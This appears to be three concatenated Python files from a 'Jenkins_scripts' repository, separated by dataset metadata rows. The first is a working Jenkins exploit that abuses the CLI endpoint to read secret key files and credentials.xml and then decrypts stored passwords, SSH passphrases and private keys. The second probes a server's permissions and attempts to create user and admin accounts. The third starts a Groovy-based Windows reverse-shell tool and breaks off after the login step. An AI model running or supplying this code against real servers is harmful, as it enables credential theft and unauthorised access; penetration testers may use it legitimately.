if len(bin_result) != 544:
print (" [-] Binary file was not retrieved complete, downloading II key!")
retrieve_instance_key(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER, bin_result)
else:
print (" [+] We got lucky, binary file was retrieved complete on first try!")
# Convert hex to bytes and write to a file
binary_data = bytes.fromhex(bin_result)
with open("hudson.util.Secret", 'wb') as binary_file:
binary_file.write(binary_data)
print (" [+] Gluing all parts into a single binary file done!")
print("[>] Downloading hudson.util.Secret completed!")
def retrieve_instance_key(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER, bin_result):
# If hudson.util.Secret can not be downloaded complete, it downloads another key and concatenate both data
print("[>] Downloading InstanceIdentity.key binary file")
# java -jar jenkins-cli.jar -s http://<JENKINS_IP>:8080 keep-build NAME 1 @'<JENKINS_PATH>\secrets\org.jenkinsci.main.modules.instance_identity.InstanceIdentity.KEY'
# Key mapping, according to the identified Jenkins path, the key changes
key_mapping = {
"3c00003a40": "6b00006940",
"3600003440": "2e00002c40",
"3d00003b40": "6c00006a40",
"2e00002c40": "5d00005b40"
}
KEY = key_mapping.get(KEY, KEY)
# Replace backslashes to slashes if requests are going to linux
path = r"/secrets/org.jenkinsci.main.modules.instance_identity.InstanceIdentity.KEY" if "/var/lib/jenkins" in INS_FOLDER else r"\secrets\org.jenkinsci.main.modules.instance_identity.InstanceIdentity.KEY"
INSIDE_PATH_HEX = (INS_FOLDER + path).encode('utf-8').hex()
# List of CLI commands in hex
lines = {
"First" : "0000000c00000a6b6565702d6275696c64000000060000044e414d450000000300000131000000" + KEY + INSIDE_PATH_HEX,
"Second" : "0000000c00000a6b6565702d6275696c64000000060000044e414d45000000" + KEY + INSIDE_PATH_HEX,
"Third" : "0000000c00000a6b6565702d6275696c64000000" + KEY + INSIDE_PATH_HEX
}
max_retries, retry_delay, retry_count = 3, 3, 0
while retry_count < max_retries:
hex_all = ""
try:
with ThreadPoolExecutor(max_workers=2) as executor:
for part, line in lines.items():
# Retrieve each part of binary file
first_request_future = executor.submit(first_request, WEBSITE, SESSION, PATH, PARAMS)
time.sleep(2)
second_request_future = executor.submit(second_request, line, WEBSITE, SESSION, PATH, PARAMS)
hex_all += first_request_future.result()
hex_all = hex_all.replace("0000000208","")
hex_all = hex_all.replace("00000001","")
hex_all += "0a" if len(hex_all) != 544 else ""
second_request_future.result()
time.sleep(2)
print (f" [+] {part} part of the binary done! {len(hex_all)} bytes")
# If binary file reaches the correct size, loop ends
if len(hex_all) == 544:
break
break
except:
print (" [-] Requests not completed. Retrying...")
retry_count += 1
time.sleep(retry_delay)
if retry_count == max_retries:
print("[X] Exploit not completed after multiple attempts... Try again!")
exit()
# Converting received data into InstanceIdentity key
bytes_object = bytes.fromhex(hex_all)
win_encoded = bytes_object.decode('windows-1252', errors='ignore').encode('windows-1252', errors='ignore')
iik_bin_result = win_encoded.hex()
if len(iik_bin_result) != 544:
print (" [-] InstanceIdentity Key binary file was not retrieved complete!")
print ("[X] Error: Can not retrieve binary files to decode secrets. Try again!")
exit()
else:
print ("[+] Downloading InstanceIdentity Key binary file completed!")
# Filling the first binary with the last bytes of second binary
miss_part = 544 - len(bin_result)
bin_all = bin_result + iik_bin_result[-miss_part:]
# Convert hex to bytes and write to a file
binary_data = bytes.fromhex(bin_all)
with open("hudson.util.Secret", 'wb') as binary_file:
binary_file.write(binary_data)
print (" [+] Gluing both files all into a single binary file done!")
print("[>] Downloading hudson.util.Secret completed!")
def retrieve_master_key(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER):
# Download master.key from server
print ("[>] Downloading master key file")
# java -jar jenkins-cli.jar -s http://<JENKINS_IP>:8080 who-am-i @'<JENKINS_PATH>\secrets\master.key'
# Key mapping, according to the identified Jenkins path, the key changes
key_mapping = {
"3c00003a40": "3400003240",
"3600003440": "2e00002c40",
"3d00003b40": "3500003340",
"2e00002c40": "2600002440"
}
KEY = key_mapping.get(KEY, KEY)
# Replace backslashes to slashes if requests are going to linux
path = r"/secrets/master.key" if "/var/lib/jenkins" in INS_FOLDER else r"\secrets\master.key"
KEY_PATH_HEX = (INS_FOLDER + path).encode('utf-8').hex()
# CLI command in hex
line = "0000000a00000877686f2d616d2d69000000" + KEY + KEY_PATH_HEX
max_retries, retry_delay, retry_count = 3, 3, 0
while retry_count < max_retries:
hex_all = ""
try:
with ThreadPoolExecutor(max_workers=2) as executor:
first_request_future = executor.submit(first_request, WEBSITE, SESSION, PATH, PARAMS)
time.sleep(1)
second_request_future = executor.submit(second_request, line, WEBSITE, SESSION, PATH, PARAMS)
hex_all = first_request_future.result()
hex_all = hex_all.replace("0000000108","")
hex_all = hex_all.replace("0000000208","")
hex_all = hex_all[:-2] if hex_all.endswith("0d") else hex_all
second_request_future.result()
time.sleep(1)
# If key file has the correct size, loop ends
if len(hex_all) == 512:
print (f" [+] Master.key file retrieved! {len(hex_all)} bytes")
break
except:
print (" [-] Requests not completed. Retrying...")
retry_count += 1
time.sleep(retry_delay)
if retry_count == max_retries:
print("[X] Exploit not completed after multiple attempts... Try again!")
exit()
# Convert to ASCII only the bytes from the key
ascii_chain = bytes.fromhex(hex_all).decode('ascii', errors='ignore')
# Save master key
with open("master.key", 'w', encoding='utf-8') as key_file:
key_file.write(ascii_chain)
print ("[>] Downloading master.key completed!")
def retrieve_credentials(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER, anon_access):
# If anonymous has read permissions, it retrieve passwords from credentials.xml
print ("[>] Checking if stored credentials can be downloaded...")
# java -jar jenkins-cli.jar -s http://<JENKINS_IP>:8080 connect-node @'<JENKINS_PATH>\credentials.xml'
# Key mapping, according to the identified Jenkins path, the key changes
if anon_access == True:
print (" [+] Extracting stored credentials from file")
else:
print ("[X] Can not download credentials due to lack of permissions...!")
return False
key_mapping = {
"3c00003a40": "3100002f40",
"3600003440": "2b00002940",
"3d00003b40": "3200003040",
"2e00002c40": "2300002140"
}
KEY = key_mapping.get(KEY, KEY)
# Replace backslashes to slashes if requests are going to linux
path = r"/credentials.xml" if "/var/lib/jenkins" in INS_FOLDER else r"\credentials.xml"
CREDS_PATH_HEX = (INS_FOLDER + path).encode('utf-8').hex()
# CLI command in hex
line = "0000000e00000c636f6e6e6563742d6e6f6465000000" + KEY + CREDS_PATH_HEX
max_retries, retry_delay, retry_count = 3, 3, 0
while retry_count < max_retries:
hex_all = ""
try:
with ThreadPoolExecutor(max_workers=2) as executor:
# Retrieve credentials file
first_request_future = executor.submit(first_request, WEBSITE, SESSION, PATH, PARAMS)
time.sleep(1)
second_request_future = executor.submit(second_request, line, WEBSITE, SESSION, PATH, PARAMS)
hex_all = first_request_future.result()
second_request_future.result()
time.sleep(1)
# If key file has the correct size, loop ends
if hex_all:
break
except:
print (" [-] Requests not completed. Retrying...")
retry_count += 1
time.sleep(retry_delay)
if retry_count == max_retries:
print("[X] Exploit not completed after multiple attempts... Try again!")
exit()
print ("[>] Extracting credentials from Jenkins completed!")
# Receive data from the response and filter it to get usernames and passwords
ascii_text = bytes.fromhex(hex_all).decode('utf-8', errors='ignore')
user_search = re.findall(r'<username>(.*?)</username>', ascii_text)
pass_search = re.findall(r'<password>{(.*?)}</password>', ascii_text)
ssh_passphrase = re.findall(r'<passphrase>{(.*?)}</passphrase>', ascii_text)
ssh_search = re.findall(r'<privateKey>{(.*?)}</privateKey>', ascii_text)
if not user_search and not pass_search and not ssh_search:
print ("[-] There is no global credentials saved. Usernames, passwords or SSH keys were not found!")
else:
# Print usernames found
if user_search:
print ("[>] Usernames found:")
users_found = tuple(set(user_search))
for users_f in users_found:
print (f" [+] {users_f}")
else:
print ("[-] There are no usernames saved in global credentials")
# Print passwords found
if pass_search:
print ("[>] Passwords found (encrypted):")
pass_found = tuple(set(pass_search))
for pass_f in pass_found:
print (f" [+] {pass_f}")
else:
pass_found = None
# Print SSH passphrases found
if ssh_passphrase:
print ("[>] SSH passphrases found (encrypted):")
passphrase_found = tuple(set(ssh_passphrase))
for passphrase_f in passphrase_found:
print (f" [+] {passphrase_f}")
else:
passphrase_found = None
# Print SSH Private keys found
if ssh_search:
print ("[>] SSH Private keys found (encrypted):")
ssh_found = tuple(set(ssh_search))
for ssh_f in ssh_found:
print (f" [+] {ssh_f[:50]}...")
else:
ssh_found = None
return pass_found, passphrase_found, ssh_found
def decrypt_passwords(pass_found, passphrase_found, ssh_found, tries=0):
# If passwords are found, start decryption process
if pass_found or passphrase_found or ssh_found:
if tries == 0:
print ("[>] Decrypting found credentials..", end='')
time.sleep(1)
decryption_magic = b'::::MAGIC::::'
# Retrieve confidentiality key
def get_confidentiality_key():
with open("master.key", 'r') as f:
master_key = f.read().encode('utf-8')
with open("hudson.util.Secret", 'rb') as f:
hudson_secret = f.read()
return decrypt_confidentiality_key(sha256(master_key).digest()[:16], hudson_secret)
# Decrypting confidentiality key
def decrypt_confidentiality_key(derived_master_key, hudson_secret):
cipher_handler = AES.new(derived_master_key, AES.MODE_ECB)
decrypted_hudson_secret = cipher_handler.decrypt(hudson_secret)
return decrypted_hudson_secret[:16] if decryption_magic in decrypted_hudson_secret else None
# Decrypting secret in Jenkins (AES CBC)
def decrypt_secret(encoded_secret, confidentiality_key):
if not encoded_secret:
return
try:
encrypted_secret = base64.b64decode(encoded_secret)
iv = encrypted_secret[9:9+16]
cipher_handler = AES.new(confidentiality_key, AES.MODE_CBC, iv)
decrypted_secret = cipher_handler.decrypt(encrypted_secret[9+16:])
padding_value = decrypted_secret[-1]
secret_length = len(decrypted_secret) - padding_value
return decrypted_secret[:secret_length] if padding_value <= 16 else decrypted_secret
except base64.binascii.Error as error:
print (f'[X] Failed base64 decoding the input with error: {error}')
return
except:
bruteforcing_secret(pass_found, tries)
# Get confidentiality key
confidentiality_key = get_confidentiality_key()
# Decrypt every password found
if pass_found:
decrypted_list = []
for secret in pass_found:
decrypted_secret = decrypt_secret(secret, confidentiality_key)
if decrypted_secret:
decrypted_list.append(decrypted_secret)
if decrypted_list:
print (".")
print ("[>] Decrypted passwords:")
for decrypted_secret in decrypted_list:
print(" [+] " + decrypted_secret.decode('utf-8', errors='ignore'))
# Decrypt every SSH passphrase found
if passphrase_found:
decrypted_passphrase_list = []
for passphrase_secret in passphrase_found:
decrypted_passphrase_secret = decrypt_secret(passphrase_secret, confidentiality_key)
if decrypted_passphrase_secret:
decrypted_passphrase_list.append(decrypted_passphrase_secret)
if decrypted_passphrase_list:
print ("[>] Decrypted SSH passphrase:")
for decrypted_passphrase_secret in decrypted_passphrase_list:
print(" [+] " + decrypted_passphrase_secret.decode('utf-8', errors='ignore'))
# Decrypt every SSH private key found
if ssh_found:
decrypted_ssh_list = []
for ssh_secret in ssh_found:
decrypted_ssh_secret = decrypt_secret(ssh_secret, confidentiality_key)
if decrypted_ssh_secret:
decrypted_ssh_list.append(decrypted_ssh_secret)
if decrypted_ssh_list:
print ("[>] Decrypted SSH Private keys:")
for decrypted_ssh_secret in decrypted_ssh_list:
print(" [+]\n" + decrypted_ssh_secret.decode('utf-8', errors='ignore'))
else:
print ("[-] Skipping decrypting passwords...")
return
def bruteforcing_secret(pass_found, tries):
# In case hudson.util.Secret losses last byte
with open("hudson.util.Secret", 'rb') as f:
hudson_secret = f.read()
hex_string = binascii.hexlify(hudson_secret).decode('utf-8')
time.sleep(0.2)
if tries == 0:
print (".\n [>] Trying to repair hudson.util.Secret binary")
print (" [ ] ", end='')
if tries % 10 == 0:
print('.', end='', flush=True)
if tries <= 255:
hex_number = hex(tries)[2:].zfill(2)
hex_string = hex_string[:-2] + hex_number
else:
print ("\n[X] Failed to decrypt passwords, binary files or encrypted passwords had errors...")
return
# Convert hex to bytes and write to a file
binary_data = bytes.fromhex(hex_string)
with open("hudson.util.Secret", 'wb') as binary_file:
binary_file.write(binary_data)
# Restart decrypting process with the modified binary file
try:
decrypt_passwords(pass_found, tries + 1)
except KeyboardInterrupt:
exit()
except:
return
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
# Define some items used in the requests
SESSION = str(uuid.uuid4())
PATH = "/cli"
PARAMS = {"remoting": "false"}
# Check connection to Jenkins server and Anonymous privilege level
anon_access = check_connection(WEBSITE)
# Verify in which possible folders is Jenkins installed
KEY, INS_FOLDER = get_installation_folder(WEBSITE, SESSION, PATH, PARAMS)
# Download hudson.util.Secret binary file
retrieve_hudson_secret(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER)
# Download master.key file
retrieve_master_key(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER)
# Retrieve credentials.xml to extract passwords
pass_found, passphrase_found, ssh_found = retrieve_credentials(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER, anon_access)
# If passwords are found, decrypt them
decrypt_passwords(pass_found, passphrase_found, ssh_found)
if __name__ == '__main__':
main()
print ("[>] Exploit done!")
| 25,623 | Python | .py | 546 | 42.576923 | 205 | 0.703481 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,567 | enum_access.py | stevenvegar_Jenkins_scripts/enum_access.py/enum_access.py | import argparse
import base64
import json
import random
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Bash reverse shell from Jenkins on a Linux-based server using batch command')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
parser.add_argument('-p','--password', type=str, help='Jenkins password (default: '')')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
if USERNAME != "anonymous":
bearer = str(base64.b64encode(bytes(USERNAME + ":" + PASSWORD, "utf-8")), encoding='ascii')
headers = {"Authorization": "Basic " + bearer}
else:
headers = None
try:
r = requests.get(WEBSITE, headers=headers, proxies=PROXIES)
#Checking connection to Jenkins server
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
#Server information based on response headers
print ("[+] Server version: " + r.headers['Server'])
print ("[+] Jenkins version: " + r.headers['X-Jenkins'])
print ("[+] Hudson version: " + r.headers['X-Hudson'])
print ("[ ] ...")
if r.status_code == 200:
print (f"[>] Using {USERNAME} for authentication...")
print ("[+] 1. Can the user view Jenkins dashboard? YES !")
print (f" [>] {WEBSITE}/")
elif r.status_code == 403:
print (f"[>] Using {USERNAME} for authentication...")
print ("[-] 1. Can the user Jenkins dashboard? NO !")
except:
if r.status_code == 401:
print (f"[>] Using {USERNAME} for authentication...")
print ("[-] Error: Username and/or password are incorrect. Check credentials.")
exit()
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/crumbIssuer/api/json", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 2. Can the user request a new \"Crumb Token\"? YES !")
jcrumb = s.json()["crumb"]
print (f" [>] Jenkins-Crumb: {jcrumb}")
elif s.status_code == 403:
jcrumb = "null"
print ("[-] 2. Can the user request a new \"Crumb Token\"? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/newJob", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 3. Can the user create a New Job? YES !")
print (f" [>] {WEBSITE}/newJob")
elif s.status_code == 403:
print ("[-] 3. Can the user create a New Job? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/view/all/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 4. Can the user view Existing Jobs? YES !")
print (f" [>] {WEBSITE}/view/all/")
elif s.status_code == 403:
print ("[-] 4. Can the user view Existing Jobs? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/view/all/builds", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 5. Can the user view Build History? YES !")
print (f" [>] {WEBSITE}/view/all/builds")
elif s.status_code == 403:
print ("[-] 5. Can the user view Build History? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/script", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 6. Can the user access to Script Console? YES !")
print (f" [>] {WEBSITE}/script")
elif s.status_code == 403:
print ("[-] 6. Can the user access to Script Console? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/jnlpJars/jenkins-cli.jar", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 7. Can the user Download jenkins-cli.jar? YES !")
print (f" [>] {WEBSITE}/jnlpJars/jenkins-cli.jar")
elif s.status_code == 403:
print ("[-] 7. Can the user Download jenkins-cli.jar? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/computer/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 8. Can the user view Node Information? YES !")
print (f" [>] {WEBSITE}/computer/")
elif s.status_code == 403:
print ("[-] 8. Can the user view Node Information? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/load-statistics", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 9. Can the user view Load Statistics? YES !")
print (f" [>] {WEBSITE}/load-statistics")
elif s.status_code == 403:
print ("[-] 9. Can the user view Load Statistics? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/env-vars.html/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 10. Can the user view Enviroment Variables? YES !")
print (f" [>] {WEBSITE}/env-vars.html/")
elif s.status_code == 403:
print ("[-] 10. Can the user view Enviroment Variables? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/instance-identity/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 11. Can the user view Instance Identity? YES !")
print (f" [>] {WEBSITE}/instance-identity/")
elif s.status_code == 403:
print ("[-] 11. Can the user view Instance Identity? NO !")
elif s.status_code == 404:
print ("[-] 11. Can the user view Instance Identity? NO !")
print (" [x] Credentials plugin not installed")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/administrativeMonitor/OldData/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 12. Can the user view Jenkins Old Data? YES !")
print (f" [>] {WEBSITE}/administrativeMonitor/OldData/")
elif s.status_code == 403:
print ("[-] 12. Can the user view Jenkins Old Data? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/manage", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 13. Can the user access Admin panel? YES !")
print (f" [>] {WEBSITE}/manage")
elif s.status_code == 403:
print ("[-] 13. Can the user access Admin panel? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/configfiles/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 14. Can the user view Config File Management? YES !")
print (f" [>] {WEBSITE}/configfiles/")
elif s.status_code == 403:
print ("[-] 14. Can the user view Config File Management? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/log/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 15. Can the user view logs? YES !")
print (f" [>] {WEBSITE}/log/")
elif s.status_code == 403:
print ("[-] 15. Can the user view logs? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/pluginManager/installed", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 16. Can the user view Installed Plugins? YES !")
print (f" [>] {WEBSITE}/pluginManager/installed")
elif s.status_code == 403:
print ("[-] 16. Can the user view Installed Plugins? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/configureSecurity/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 17. Can the user Configure Global Security? YES !")
print (f" [>] {WEBSITE}/configureSecurity/")
elif s.status_code == 403:
print ("[-] 17. Can the user Configure Global Security? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/configureTools/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 18. Can the user view Global Tool Configuration? YES !")
print (f" [>] {WEBSITE}/configureTools/")
elif s.status_code == 403:
print ("[-] 18. Can the user view Global Tool Configuration? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/credentials/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 19. Can the user view Credentials? YES !")
print (f" [>] {WEBSITE}/credentials/")
elif s.status_code == 403:
print ("[-] 19. Can the user view Credentials? NO !")
elif s.status_code == 404:
print ("[-] 19. Can the user view Credentials? NO !")
print (" [x] Credentials plugin not installed")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/credentials/store/system/domain/_/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 20. Can the user view Global credentials (unrestricted)? YES !")
print (f" [>] {WEBSITE}/credentials/store/system/domain/_/")
elif s.status_code == 403:
print ("[-] 20. Can the user view Global credentials (unrestricted)? NO !")
elif s.status_code == 404:
print ("[-] 20. Can the user view Global credentials (unrestricted)? NO !")
print (" [x] Credentials plugin not installed")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
random_name = "user_" + ''.join(random.choice('0123456789') for i in range(6))
data = {
"username": random_name,
"password1": random_name,
"password2": random_name,
"fullname": random_name,
"email": random_name + "@mail.com",
"Jenkins-Crumb": jcrumb,
"Submit": "Create account"}
s = requests.post(WEBSITE + "/securityRealm/createAccount", data=data, headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 21. Can the user SignUp new users? YES !")
print (f" [>] {WEBSITE}/securityRealm/user/{random_name}/")
elif s.status_code == 401:
print ("[-] 21. Can the user SignUp new users? NO !")
print (" [x] Signing Up new users is disabled")
elif s.status_code == 403:
print ("[-] 21. Can the user SignUp new users? NO !")
elif s.status_code == 404:
print ("[-] 21. Can the user SignUp new users? NO !")
print (" [x] Local authentication disabled")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
random_name = "user_" + ''.join(random.choice('0123456789') for i in range(6))
data = {
"username": random_name,
"password1": random_name,
"password2": random_name,
"fullname": random_name,
"email": random_name + "@mail.com",
"Jenkins-Crumb": jcrumb,
"Submit": "Create User"}
s = requests.post(WEBSITE + "/securityRealm/createAccountByAdmin", data=data, headers=headers, proxies=PROXIES, allow_redirects=False)
if s.status_code == 302:
print ("[+] 22. Can the user add new Admin users? YES !")
print (f" [>] {WEBSITE}/securityRealm/user/{random_name}/")
elif s.status_code == 403:
print ("[-] 22. Can the user add new Admin users? NO !")
elif s.status_code == 404:
print ("[-] 22. Can the user add new Admin users? NO !")
print (" [x] Local authentication disabled")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/asynchPeople/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 23. Can the user view local user list? YES !")
print (f" [>] {WEBSITE}/asynchPeople/")
elif s.status_code == 403:
print ("[-] 23. Can the user view local user list? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/securityRealm/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 24. Can the user view Jenkins own user database? YES !")
print (f" [>] {WEBSITE}/securityRealm/")
elif s.status_code == 403:
print ("[-] 24. Can the user view Jenkins own user database? NO !")
elif s.status_code == 404:
print ("[-] 24. Can the user view Jenkins own user database? NO !")
print (" [x] Local authentication disabled")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/ad-health/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 25. Can the user view Active Directory health? YES !")
print (f" [>] {WEBSITE}/ad-health/")
elif s.status_code == 403:
print ("[-] 25. Can the user view Active Directory health? NO !")
elif s.status_code == 404:
print ("[-] 25. Can the user view Active Directory health? NO !")
print (" [x] AD plugin not installed")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
try:
s = requests.get(WEBSITE + "/whoAmI/", headers=headers, proxies=PROXIES)
if s.status_code == 200:
print ("[+] 26. Can the user view current user information? YES !")
print (f" [>] {WEBSITE}/whoAmI/")
elif s.status_code == 403:
print ("[-] 26. Can the user view current user information? NO !")
except:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#/plugin/email-ext
if __name__ == "__main__":
main()
| 15,293 | Python | .py | 349 | 39.530086 | 144 | 0.643107 | stevenvegar/Jenkins_scripts | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,568 | win_revshell_groovy.py | stevenvegar_Jenkins_scripts/win_revshell_groovy.py/win_revshell_groovy.py | from bs4 import BeautifulSoup
import argparse
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Powershell reverse shell from Jenkins on a Windows-based server using Groovy script')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
parser.add_argument('-p','--password', type=str, help='Jenkins password (default: '')')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
#Grabbing Jenkins-Crumb from response body
soup = BeautifulSoup(r.content, "html.parser")
